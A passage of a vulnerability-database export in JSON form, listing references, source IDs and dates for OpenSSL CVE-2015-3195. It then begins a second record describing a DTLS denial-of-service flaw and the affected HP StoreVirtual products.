"https://github.com/live-hack-cve/cve-2015-3195 " } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "VULMON", "id": "CVE-2015-3195" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "CNNVD", "id": "CNNVD-201512-075" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-81156" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "NVD", "id": "CVE-2015-3195" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.debian.org/security/2015/dsa-3413" }, { "trust": 1.9, "url": "http://openssl.org/news/secadv/20151203.txt" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2015-2616.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/78626" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151204-openssl" }, { "trust": 1.8, "url": "http://fortiguard.com/advisory/openssl-advisory-december-2015" }, { "trust": 1.8, "url": "http://www.fortiguard.com/advisory/openssl-advisory-december-2015" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04944173" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05111017" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05131085" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05398322" }, { "trust": 1.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40100" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-december/173801.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-2617.html" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034294" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00017.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00070.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00071.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00087.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00103.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00009.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2830-1" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=145382583417444\u0026w=2" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2015\u0026m=slackware-security.754583" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10733" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=cc598f321fbac9c04da5766243ed55d55948637d" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3195" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95113540/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97668313" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3195" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.7, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=cc598f321fbac9c04da5766243ed55d55948637d" }, { "trust": 0.6, "url": "https://www.openssl.org/news/secadv/20151203.txt" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.2, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.2, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.2, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-4000" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-3110" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3183" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110" }, { "trust": 0.2, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10733" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10759" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10761" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=145382583417444\u0026amp;w=2" }, { "trust": 0.1, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2015\u0026amp;m=slackware-security.754583" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2616" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2830-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42530" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05398322" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3193" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1794" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7995" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3237" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0728" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05111017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4969" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131044" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05130958" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightcontrol" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-2054.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/6.4/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206171" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6808" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1838" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4483" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-8612" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3185" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3194" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1833" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5420" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2012-1148" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5419" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4447" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-7141" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "VULHUB", "id": "VHN-81156" }, { "db": "VULMON", "id": "CVE-2015-3195" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "139114" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134783" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "CNNVD", "id": "CNNVD-201512-075" }, { "db": "NVD", "id": "CVE-2015-3195" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "VULHUB", "id": "VHN-81156" }, { "db": "VULMON", "id": "CVE-2015-3195" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "139114" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134783" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "CNNVD", "id": "CNNVD-201512-075" }, { "db": "NVD", "id": "CVE-2015-3195" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-12-07T00:00:00", "db": "CNVD", "id": "CNVD-2015-07950" }, { "date": "2015-12-06T00:00:00", "db": "VULHUB", "id": "VHN-81156" }, { "date": "2015-12-06T00:00:00", "db": "VULMON", "id": "CVE-2015-3195" }, { "date": "2015-12-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "date": "2017-02-23T17:10:09", "db": "PACKETSTORM", "id": "141239" }, { "date": "2016-06-02T19:12:12", "db": "PACKETSTORM", "id": "137292" }, { "date": "2016-10-12T20:16:45", "db": "PACKETSTORM", "id": "139114" }, { "date": "2016-03-22T15:18:02", "db": "PACKETSTORM", "id": "136346" }, { "date": "2016-10-12T23:44:55", "db": "PACKETSTORM", "id": "139116" }, { "date": "2016-12-16T16:34:49", "db": "PACKETSTORM", "id": "140182" }, { "date": "2015-12-14T16:40:07", "db": "PACKETSTORM", "id": "134783" }, { "date": "2015-12-04T17:22:00", "db": "PACKETSTORM", "id": "134632" }, { "date": "2015-12-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201512-075" }, { "date": "2015-12-06T20:59:05.973000", "db": "NVD", "id": "CVE-2015-3195" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-12-07T00:00:00", "db": "CNVD", "id": "CNVD-2015-07950" }, { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-81156" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2015-3195" }, { "date": "2016-11-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201512-075" }, { "date": "2023-11-07T02:25:31.687000", "db": "NVD", "id": "CVE-2015-3195" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "134783" }, { "db": "CNNVD", "id": "CNNVD-201512-075" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/asn1/tasn_dec.c of ASN1_TFLG_COMBINE Vulnerability in the implementation of critical information obtained from process memory", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006116" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201512-075" } ], "trust": 0.6 } }
var-201406-0142
Vulnerability from variot
The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake. OpenSSL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. OpenSSL prior to 0.9.8za,1.0.0m and 1.0.1h are vulnerable. These vulnerabilities include:
-
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information.
-
HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
